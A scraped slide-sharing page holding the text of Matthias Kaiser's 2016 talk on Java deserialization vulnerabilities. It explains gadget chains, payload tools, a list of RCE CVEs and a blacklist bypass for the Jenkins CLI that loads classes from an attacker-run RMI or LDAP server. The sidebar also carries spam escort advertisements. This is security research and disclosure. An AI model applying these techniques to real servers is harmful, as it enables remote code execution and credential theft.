Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
 
La sezione Riepilogo nel Profilo LinkedIn
La sezione Riepilogo nel Profilo LinkedInLa sezione Riepilogo nel Profilo LinkedIn
La sezione Riepilogo nel Profilo LinkedIn
 

Similar to Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)

Unikernels - Bristech June 2016
Unikernels - Bristech June 2016 Unikernels - Bristech June 2016
Unikernels - Bristech June 2016 Daniel Drozdzewski
 
Play framework
Play frameworkPlay framework
Play frameworkAndrew Skiba
 
Object Oriented Programming-JAVA
Object Oriented Programming-JAVAObject Oriented Programming-JAVA
Object Oriented Programming-JAVAHome
 
Java Lecture 1
Java Lecture 1Java Lecture 1
Java Lecture 1Qualys
 
Microservices and containers for the unitiated
Microservices and containers for the unitiatedMicroservices and containers for the unitiated
Microservices and containers for the unitiatedKevin Lee
 
Intoduction to java
Intoduction to javaIntoduction to java
Intoduction to javajalinder123
 
Dr. Rajeshree Khande :Intoduction to java
Dr. Rajeshree Khande :Intoduction to javaDr. Rajeshree Khande :Intoduction to java
Dr. Rajeshree Khande :Intoduction to javaDrRajeshreeKhande
 
Docker intro
Docker introDocker intro
Docker introFrei Zhang
 
Java se7 features
Java se7 featuresJava se7 features
Java se7 featuresKumaraswamy M
 
Java Attacks & Defenses - End of Year 2010 Presentation
Java Attacks & Defenses - End of Year 2010 PresentationJava Attacks & Defenses - End of Year 2010 Presentation
Java Attacks & Defenses - End of Year 2010 PresentationJames Hamilton
 
Java 6 [Mustang] - Features and Enchantments
Java 6 [Mustang] - Features and Enchantments Java 6 [Mustang] - Features and Enchantments
Java 6 [Mustang] - Features and Enchantments Pavel Kaminsky
 
maven-for-maine-jug-090226091601-phpapp02.ppt
maven-for-maine-jug-090226091601-phpapp02.pptmaven-for-maine-jug-090226091601-phpapp02.ppt
maven-for-maine-jug-090226091601-phpapp02.pptnikhilmahendranath1
 
Developing Java Web Applications
Developing Java Web ApplicationsDeveloping Java Web Applications
Developing Java Web Applicationshchen1
 
01. Introduction to programming with java
01. Introduction to programming with java01. Introduction to programming with java
01. Introduction to programming with javaIntro C# Book
 
Introduction to Java Programming, Basic Structure, variables Data type, input...
Introduction to Java Programming, Basic Structure, variables Data type, input...Introduction to Java Programming, Basic Structure, variables Data type, input...
Introduction to Java Programming, Basic Structure, variables Data type, input...Mr. Akaash
 

Similar to Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition) (20)

Unikernels - Bristech June 2016
Unikernels - Bristech June 2016 Unikernels - Bristech June 2016
Unikernels - Bristech June 2016
 
Play framework
Play frameworkPlay framework
Play framework
 
Object Oriented Programming-JAVA
Object Oriented Programming-JAVAObject Oriented Programming-JAVA
Object Oriented Programming-JAVA
 
Java Lecture 1
Java Lecture 1Java Lecture 1
Java Lecture 1
 
Microservices and containers for the unitiated
Microservices and containers for the unitiatedMicroservices and containers for the unitiated
Microservices and containers for the unitiated
 
Intoduction to java
Intoduction to javaIntoduction to java
Intoduction to java
 
Dr. Rajeshree Khande :Intoduction to java
Dr. Rajeshree Khande :Intoduction to javaDr. Rajeshree Khande :Intoduction to java
Dr. Rajeshree Khande :Intoduction to java
 
Docker intro
Docker introDocker intro
Docker intro
 
Java Basics
Java BasicsJava Basics
Java Basics
 
Java se7 features
Java se7 featuresJava se7 features
Java se7 features
 
Java introduction
Java introductionJava introduction
Java introduction
 
Tech Days 2010
Tech Days 2010Tech Days 2010
Tech Days 2010
 
Java Attacks & Defenses - End of Year 2010 Presentation
Java Attacks & Defenses - End of Year 2010 PresentationJava Attacks & Defenses - End of Year 2010 Presentation
Java Attacks & Defenses - End of Year 2010 Presentation
 
Java 6 [Mustang] - Features and Enchantments
Java 6 [Mustang] - Features and Enchantments Java 6 [Mustang] - Features and Enchantments
Java 6 [Mustang] - Features and Enchantments
 
maven-for-maine-jug-090226091601-phpapp02.ppt
maven-for-maine-jug-090226091601-phpapp02.pptmaven-for-maine-jug-090226091601-phpapp02.ppt
maven-for-maine-jug-090226091601-phpapp02.ppt
 
Developing Java Web Applications
Developing Java Web ApplicationsDeveloping Java Web Applications
Developing Java Web Applications
 
UNIT 1.pptx
UNIT 1.pptxUNIT 1.pptx
UNIT 1.pptx
 
Java Class1
Java Class1Java Class1
Java Class1
 
01. Introduction to programming with java
01. Introduction to programming with java01. Introduction to programming with java
01. Introduction to programming with java
 
Introduction to Java Programming, Basic Structure, variables Data type, input...
Introduction to Java Programming, Basic Structure, variables Data type, input...Introduction to Java Programming, Basic Structure, variables Data type, input...
Introduction to Java Programming, Basic Structure, variables Data type, input...
 

Recently uploaded

Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackVICTOR MAESTRE RAMIREZ
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxTier1 app
 
why an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdfwhy an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdfjoe51371421
 
Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...aditisharan08
 
cybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningcybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningVitsRangannavar
 
Project Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanationProject Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanationkaushalgiri8080
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVshikhaohhpro
 
Call Girls in Naraina Delhi đŸ’¯Call Us 🔝8264348440🔝
Call Girls in Naraina Delhi đŸ’¯Call Us 🔝8264348440🔝Call Girls in Naraina Delhi đŸ’¯Call Us 🔝8264348440🔝
Call Girls in Naraina Delhi đŸ’¯Call Us 🔝8264348440🔝soniya singh
 
What is Binary Language? Computer Number Systems
What is Binary Language? Computer Number SystemsWhat is Binary Language? Computer Number Systems
What is Binary Language? Computer Number SystemsJheuzeDellosa
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsAlberto GonzÃĄlez Trastoy
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio, Inc.
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...ICS
 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideChristina Lin
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...Christina Lin
 
EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityNeo4j
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEOrtus Solutions, Corp
 
Professional Resume Template for Software Developers
Professional Resume Template for Software DevelopersProfessional Resume Template for Software Developers
Professional Resume Template for Software DevelopersVinodh Ram
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)OPEN KNOWLEDGE GmbH
 
Russian Call Girls in Karol Bagh Aasnvi ➡ī¸ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡ī¸ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡ī¸ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡ī¸ 8264348440 💋📞 Independent Escort S...soniya singh
 

Recently uploaded (20)

Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStack
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
 
why an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdfwhy an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdf
 
Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...
 
cybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningcybersecurity notes for mca students for learning
cybersecurity notes for mca students for learning
 
Project Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanationProject Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanation
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTV
 
Call Girls in Naraina Delhi đŸ’¯Call Us 🔝8264348440🔝
Call Girls in Naraina Delhi đŸ’¯Call Us 🔝8264348440🔝Call Girls in Naraina Delhi đŸ’¯Call Us 🔝8264348440🔝
Call Girls in Naraina Delhi đŸ’¯Call Us 🔝8264348440🔝
 
What is Binary Language? Computer Number Systems
What is Binary Language? Computer Number SystemsWhat is Binary Language? Computer Number Systems
What is Binary Language? Computer Number Systems
 
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi đŸĢĻ HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi đŸĢĻ HOT AND SEXY VVIP 🍎 SE...Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi đŸĢĻ HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi đŸĢĻ HOT AND SEXY VVIP 🍎 SE...
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
 
EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered Sustainability
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
 
Professional Resume Template for Software Developers
Professional Resume Template for Software DevelopersProfessional Resume Template for Software Developers
Professional Resume Template for Software Developers
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)
 
Russian Call Girls in Karol Bagh Aasnvi ➡ī¸ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡ī¸ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡ī¸ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡ī¸ 8264348440 💋📞 Independent Escort S...
 

Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)

  • 1. Java Deserialization Vulnerabilities – The Forgotten Bug Class Matthias Kaiser (@matthias_kaiser)
  • 2. About me ī‚§ Head of Vulnerability Research at Code White in Ulm, Germany ī‚§ Dev for defense company in the past ī‚§ Spent a lot of time on (server-side) Java Security ī‚§ Found bugs in products of Oracle, VMware, IBM, SAP, Symantec, Apache, Adobe, HP, etc. ī‚§ Recently looking more into the Windows world and client-side stuff @matthias_kaiser 11.11.2016 2
  • 3. Agenda ī‚§ Introduction ī‚§ Java’s Object Serialization ī‚§ What’s the problem with it ī‚§ A history of bugs ī‚§ Finding and exploiting ī‚§ Code White’s bug parade ī‚§ A hands-on example ī‚§ More to come? 11.11.2016 3
  • 4. Should you care? ī‚§ If your client is running server products of you SHOULD! 11.11.2016 4
  • 5. Some facts ī‚§ The bug class exists for more than 10 years ī‚§ Most ignored bug class in the server-side Java world until 2015 ī‚§ A easy way to get reliable RCE on a server ī‚§ Architecture independent exploitation ī‚§ With Java deserialization vulnerabilities you can pwn a corp easily! 11.11.2016 5
  • 6. Where is it used ī‚§ Several J2EE/JEE core technologies rely on serialization ī‚§ Remote Method Invocation (RMI) ī‚§ Java Management Extension (JMX) ī‚§ Java Message Service (JMS) ī‚§ Java Server Faces implementations (ViewState) ī‚§ Communication between JVMs in general (because devs are lazy :-) ī‚§ Custom application protocols running on top of http, etc. 11.11.2016 6
  • 7. What is serialization? Object File Network Database ObjectStream of bytes Stream of bytes Serialization Deserialization 11.11.2016 7
  • 8. Overview of Java’s Object Serialization Protocol Magic class name field type class field Class description info TC_OBJECT TC_CLASSDESC classdata[] 11.11.2016 8
  • 9. There is protocol spec and a grammar https://docs.oracle.com/javase/8/docs/platform/serialization/spec/protocol.html 11.11.2016 9
  • 10. Deserializing an object What could possibly go wrong here? 11.11.2016 10
  • 11. What’s the problem ī‚§ ObjectInputStream doesn’t include validation features in its API ī‚§ All serializable classes that the current classloader can locate and load can get deserialized ī‚§ Although a class cast exception might occur in the end, the object will be created! 11.11.2016 11
  • 12. What’s the problem #2 ī‚§ A developer can customize the (de)-serialization of a serializable class ī‚§ Implement methods writeObject(), writeReplace(), readObject() and readResolve() ī‚§ ObjectInputStream invokes readObject() and readResolve() Under our control! 11.11.2016 12
  • 13. What’s the problem #3 ī‚§ Further methods can be triggered by using certain classes as a "trampoline" ī‚§ Object.toString() using e.g. javax.management.BadAttributeValueExpException ī‚§ Object.hashCode() using e.g. java.util.HashMap ī‚§ Comparator.compare() using e.g. java.util.PriorityQueue ī‚§ etc. Trampoline class Target class 11.11.2016 13
  • 14. What’s the problem #3 javax.management.BadAttributeValueExpException 1. Reading the field "val" 2. Calling "toString()" on "val" 11.11.2016 14
  • 15. History of Java deserialization vulnerabilities JRE vulnerabilities (DoS) Mark SchÃļnefeld 2006 JSF Viewstate XSS/DoS Sun Java Web Console Luca Carretoni 2008 CVE-2011-2894 Spring Framework RCE Wouter Coekaerts CVE-2012-4858 IBM Cognos Business Intelligence RCE Pierre Ernst 2011 2012 11.11.2016 15
  • 16. History of Java deserialization vulnerabilities CVE-2013-1768 Apache OpenJPA RCE CVE-2013-1777 Apache Geronimo 3 RCE CVE-2013-2186 Apache commons-fileupload RCE Pierre Ernst CVE-2015-3253 Groovy RCE CVE-2015-7501 Commons-Collection RCE Gabriel Lawrence and Chris Frohoff CVE-2013-2165 JBoss RichFaces RCE Takeshi Terada 2013 2015 11.11.2016 16
  • 17. #JavaDeser is new hotness â€Ļ 11.11.2016 17
  • 18. Finding is trivial ī‚§ Do the "grep" thing on "readObject()" 11.11.2016 18
  • 19. Finding is trivial ī‚§ Use an IDE like Intellij or Eclipse and trace the call paths to ObjectInputStream.readObject() 11.11.2016 19
  • 20. Exploitation ī‚§ Exploitation requires a chain of serialized objects triggering interesting functionality e.g. ī‚§ writing files ī‚§ dynamic method calls using Java’s Reflection API ī‚§ etc. ī‚§ For such a chain the term "gadget" got established ī‚§ Chris Frohoff and others found several gadgets in standard libs 11.11.2016 20
  • 21. Javassist/Weld Gadget ī‚§ Gadget utilizes JBoss’ Javassist and Weld framework ī‚§ Reported to Oracle with the Weblogic T3 vulnerability ī‚§ Works in Oracle Weblogic and JBoss EAP ī‚§ Allows us to call a method on a deserialized object 11.11.2016 21
  • 22. "Return of the Rhino"-Gadget ī‚§ Gadget utilizes Rhino Script Engine of Mozilla ī‚§ Works with latest Rhino in the classpath ī‚§ Oracle applied some hardening to its Rhino version ī‚§ So only works Oracle JRE <= jre7u13 īŒ ī‚§ Works with latest openjdk7-JRE (e.g. on Debian, Ubuntu) īŠ ī‚§ Allows us to call a method on a deserialized object ī‚§ JRE Gadget īŠ 11.11.2016 22
  • 23. What to look for? ī‚§ Look for methods in serializable classes ī‚§ working on files ī‚§ triggering reflection (invoking methods, getting/setting properties on beans) ī‚§ doing native calls ī‚§ etc. AND being called from ī‚§ readObject() ī‚§ readResolve() ī‚§ toString() ī‚§ hashCode() ī‚§ finalize() ī‚§ any other method being called from a "Trampoline" class 11.11.2016 23
  • 24. What to look for? ī‚§ Look at serializable classes used in Java reflection proxies ī‚§ java.lang.reflect.InvocationHandler implementations ī‚§ javassist.util.proxy.MethodHandler implementations InvocationHandlerInterface Proxy toString() invoke (â€Ļ) // do smth invoke (target, toString, args) 11.11.2016 24
  • 25. What to look for? Prints out method being called 11.11.2016 25
  • 26. What to look for? What if InvocationHandler.invoke() does "insecure stuff" using values from the serialized object input stream? Proxy 11.11.2016 26
  • 27. Making gadget search easier ī‚§ Chris Frohoff released a tool for finding gadgets using a graph database ī‚§ Using object graph queries for gadget search 11.11.2016 27
  • 28. Exploitation tricks ī‚§ Adam Gowdiak’s TemplatesImpl ī‚§ com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl is serializable ī‚§ Allows to define new classes from your byte[ ][ ] ī‚§ Calling TemplatesImpl.newTransformer() on deserialized object īƒ  Code Execution 11.11.2016 28
  • 29. Exploitation tricks ī‚§ InitialContext.lookup() ī‚§ @benmmurphy used it for a sandbox escape (CVE-2013-5830) ī‚§ @zerothoughts published a gadget in Spring’s JtaTransactionManager recently ī‚§ Triggers InitialContext.lookup(jndiName) ī‚§ Uses "rmi://yourFakeRmiServer/Object" as jndiName ī‚§ Loads classes from your fake RMI server ī‚§ Calling JdbcRowSetImpl.execute() on a deserialized object will do the same īŠ 11.11.2016 29
  • 30. Payload generation ī‚§ Chris Frohoff released the great tool "ysoserial" ī‚§ Makes creation of payloads easy ī‚§ Includes gadgets for ī‚§ Commons Collection 3 & 4 ī‚§ Spring ī‚§ Groovy ī‚§ JRE7 (<= jre7u21) ī‚§ Commons BeanUtils ī‚§ and even more! 11.11.2016 30
  • 31. Custom payloads ī‚§ I wouldn’t go for Runtime.getRuntime().exec(cmd) for several reasons ī‚§ Most of the gadgets don’t touch the disk īŠ ī‚§ With scripting languages your life gets even easier ī‚§ Use what’s in the classpath ī‚§ Javascript (Rhino, Nashorn) ī‚§ Groovy ī‚§ Beanshell ī‚§ etc. 11.11.2016 31
  • 32. Code White’s Bug Parade #1 ī‚§ CVE-2015-6554 - Symantec Endpoint Protection Manager RCE ī‚§ CVE-2015-6576 - Atlassian Bamboo RCE ī‚§ CVE-2015-7253 - Commvault Edge Server RCE ī‚§ CVE-2015-7253 - Apache ActiveMQ RCE ī‚§ CVE-2015-4582 - Oracle Weblogic RCE ī‚§ CVE-2016-1998 - HP Service Manager RCE ī‚§ CVE-2016-2173 - Spring AMQP RCE ī‚§ CVE-2016-3493 - Oracle Hyperion RCE ī‚§ CVE-2016-3551 - Oracle Weblogic RCE ī‚§ CVE-2016-3551 - Oracle Weblogic RCE 11.11.2016 32
  • 33. Code White’s Bug Parade #2 ī‚§ NOT-FIXED - IBM WebSphere MQ JMS client RCE ī‚§ NOT-FIXED - IBM WebSphere JMS Client RCE ī‚§ NOT-FIXED - Pivotal RabbitMQ JMS client RCE ī‚§ NOT-FIXED - Oracle OpenMQ JMS client RCE ī‚§ CVE-2016-4978 - Apache ActiveMQ Artemis JMS client RCE ī‚§ CVE-2016-4974 - Apache Qpid client/JMS client RCE ī‚§ CVE-2016-0638 - Oracle Weblogic JMS client RCE ī‚§ FIXED-NO-CVE - IIT Software SwiftMQ JMS client RCE ī‚§ MAYBE-FIX - Amazon SQS Java Messaging RCE ī‚§ WONT-FIX - JBOSS HornetQ JMS client RCE 11.11.2016 33
  • 37. Jenkins ī‚§ Open Source Automation Server / Continous Integration Server / "Build"-Server ī‚§ Created by Kohsuke Kawaguchi (Ex-Oracle, now CTO of CloudBees) ī‚§ Fork of Oracle’s Hudson CI server ī‚§ Supports Subversion, Git, Mecurial, etc. ī‚§ Runs Maven, Ant, etc. ī‚§ More than 1200 plugins! (see https://updates.jenkins-ci.org/download/plugins/) 11.11.2016 37
  • 38. Jenkins ī‚§ Nice target because Jenkins ī‚§ has access to Source Code repositories ī‚§ creates deployment artefacts (Jar, War, Ear, etc.) ī‚§ can deploy artefacts on target servers ī‚§ stores credentials (user/password, SSH keys) 11.11.2016 38
  • 39. Jenkins Internals ī‚§ Jenkins uses an extra port for the Command Line Interface (CLI) ī‚§ Can be configured to a fixed or random port 11.11.2016 39
  • 40. Jenkins Internals ī‚§ Jenkins uses an own RMI protocol for it’s Command Line Interface (CLI) ī‚§ Base64-encoded serialized objects (rO0 īƒ 0xac,0xed) 11.11.2016 40
  • 41. Jenkins under Attack ī‚§ Jenkins CLI endpoint suffered from several vulnerabilities ī‚§ CVE-2015-8103 of Steven Breen using Commons Collections gadget ī‚§ Jenkins introduced a blacklist to filter gadget classes ī‚§ CVE-2016-0788 of Moritz Bechler bypassing the blacklist (see ERNW blog post https://insinuator.net/2016/07/jenkins-remoting-rce-ii-the-return-of-the-ysoserial/) ī‚§ As we all know blacklisting is hard because you never know â€Ļ 11.11.2016 41
  • 43. Finding a blacklist filter bypass ī‚§ How to bypass a gadget blacklist filter? a) Find a new gadget b) Find a bypass gadget (see Alvaro’s and Christian’s Research) c) Look for partially fixed gadget ī‚§ After looking at all gadgets of ysoserial and matching them with Jenkin’s third-party libs and the blacklist I found one interesting gadget discovered by Moritz Bechler: 11.11.2016 43
  • 44. The JSON1 gadget ī‚§ "Code execution step" ī‚§ filtered by blacklist īŒ ī‚§ "Trigger step" ī‚§ invokes all "getter" methods on a serialized object ī‚§ Not filtered by blacklist īŠ ī‚§ "Init step" 11.11.2016 44
  • 45. Finding a blacklist filter bypass #1 ī‚§ Initial idea was to use the JDBCRowSetImpl trick as code execution step ī‚§ "Getter"-methods trigger JNDI call: ī‚§ But net.sf.json.JSONObject.containsValue(JDBCRowSetImpl-instance) fails because several "Getter"-methods trigger Exceptions īŒ 11.11.2016 45
  • 46. Finding a blacklist filter bypass #2 ī‚§ Next idea was to look for other serializable classes with "Getter"-Methods leading to code execution ī‚§ Recent research FTW: 11.11.2016 46
  • 47. Finding a blacklist filter bypass #2 ī‚§ JNDI lookups can lead to RCE (see JDBCRowSetImpl) ī‚§ Exploitation using RMI, LDAP and CORBA ī‚§ LDAP queries can lead to RCE ī‚§ LDAP server needs to be under your control ī‚§ data from LDAPresponse is deserialized using ObjectInputStream ī‚§ data (URLs) from LDAP response is used to load classes using URLClassLoader -> RCE ī‚§ I found some nice classes in package „com.sun.jndi.ldap" ī‚§ One of it is the serializable class "com.sun.jndi.ldap.LdapAttribute" 11.11.2016 47
  • 49. Putting all together for the new JSON2 gadget 11.11.2016 49 ī‚§ With LdapAttribute.getAttributeDefinition() we get Code Execution using a custom LDAP server ī‚§ The "Init-Step" shown before doesn’t work, so we need something else īŒ ī‚§ By using Eclipse an alternative code path can be easily found īŠ
  • 50. Some "updates" with regards to exploitation â€Ļ ī‚§ Previous research only mentioned the CLI port! ī‚§ If you have Jenkins running on the internet with firewall / reverse proxy, you can’t connect ī‚§ But the Jenkins Wiki has some hidden gems for us: Connection mechanism 1. Jenkins CLI clients and Jenkins server establishes the communication in the following fashion. Jenkins listens on a TCP/IP port configured under "TCP port for JNLP agents" in the system configuration page. This single port is used for both agents and CLI. â€Ļ 5. If that fails (for example, if there's a reverse proxy and Jenkins runs on a different host, or if a firewall blocks access to this TCP/IP port), or if the header is not found, it will fall back to the communication mechanism that uses two simultaenous HTTP connections. 11.11.2016 50
  • 51. Jenkins CLI HTTP "fallback" 11.11.2016 51 ī‚§ HTTP Connection #1 ī‚§ Server īƒ  Client channel ī‚§ Client reads from InputStream ī‚§ UUID as identifier ī‚§ Blocks until #2 connects ī‚§ HTTP Connection #2 ī‚§ Client īƒ  Server channel ī‚§ Client writes to OutputStream ī‚§ UUID as identifier
  • 52. Jenkins - 2.19.2 LTS DEMO 11.11.2016 52
  • 53. Jenkins - 2.19.2 LTS 11.11.2016 53
  • 54. Jenkins - 2.19.2 LTS 11.11.2016 54
  • 55. Conclusion ī‚§ Java Deserialization is no rocket science ī‚§ Finding bugs is trivial, exploitation takes more ī‚§ So many products affected by it ī‚§ Research has started, again â€Ļ ī‚§ This will never end! 11.11.2016 55
  • 57. Java Deserialization Vulnerabilities – The forgotten bug class Matthias Kaiser